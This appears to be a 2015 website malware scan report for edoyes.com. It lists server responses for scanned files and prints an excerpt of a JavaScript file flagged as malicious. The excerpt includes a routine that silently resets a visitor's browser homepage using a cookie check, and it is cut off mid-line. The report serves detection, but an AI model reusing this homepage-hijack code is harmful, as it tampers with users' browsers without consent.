Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=edoyes.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://edoyes.com/ | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 02:12:17 GMT Accept-Ranges: bytes ETag: "98207fcc1f55d01:1b7c" Server: Microsoft-IIS/6.0 Content-Length: 51802 Content-Location: http://edoyes.com/index.html Content-Type: text/html Last-Modified: Mon, 02 Mar 2015 19:33:45 GMT X-Powered-By: ASP.NET | clean |
http://edoyes.com/index.html | 200 OK Content-Length: 51802 Content-Type: text/html | clean |
http://edoyes.com/abase.js | 200 OK Content-Length: 4139 Content-Type: application/x-javascript | clean |
http://edoyes.com/images/index_fz.js | 200 OK Content-Length: 5513 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var global_html_pool = [];
var global_script_pool = [];
var global_script_src_pool = [];
var global_lock_pool = [];
var innerhtml_lock = null;
var document_buffer = "";
function set_innerHTML(obj_id, html, time) {
  if (innerhtml_lock == null) {
    innerhtml_lock = obj_id;
  } else if (typeof(time) == "undefined") {
    global_lock_pool[obj_id + "_html"] = html;
    window.setTimeout("set_innerHTML
}
function SetCookie(name,value){
  var Days = 1;
  var exp = new Date();
  exp.setTime(exp.getTime() + Days*24*60*60*1000);
  document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
}
function setpage(aa,str){
  aa.style.behavior="url(#default#homepage)";
  var bb=getCookie("username");
  if (bb!='easyplay8er') {
    aa.setHomePage(str);
    SetCookie("username","easyplay8er");
  }
}
Antivirus reports:
http://edoyes.com/images/index_fz2.js | 200 OK Content-Length: 343 Content-Type: application/x-javascript | clean |
http://edoyes.com/ad/index_760.js | 404 Not Found Content-Length: 1121 Content-Type: text/html | clean |
http://edoyes.com/test404page.js | 404 Not Found Content-Length: 1121 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: edoyes.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 02:12:17 GMT
Accept-Ranges: bytes
ETag: "98207fcc1f55d01:1b7c"
Server: Microsoft-IIS/6.0
Content-Length: 51802
Content-Location: http://edoyes.com/index.html
Content-Type: text/html
Last-Modified: Mon, 02 Mar 2015 19:33:45 GMT
X-Powered-By: ASP.NET
...51802 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: edoyes.com
Referer: http://www.google.com/search?q=edoyes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.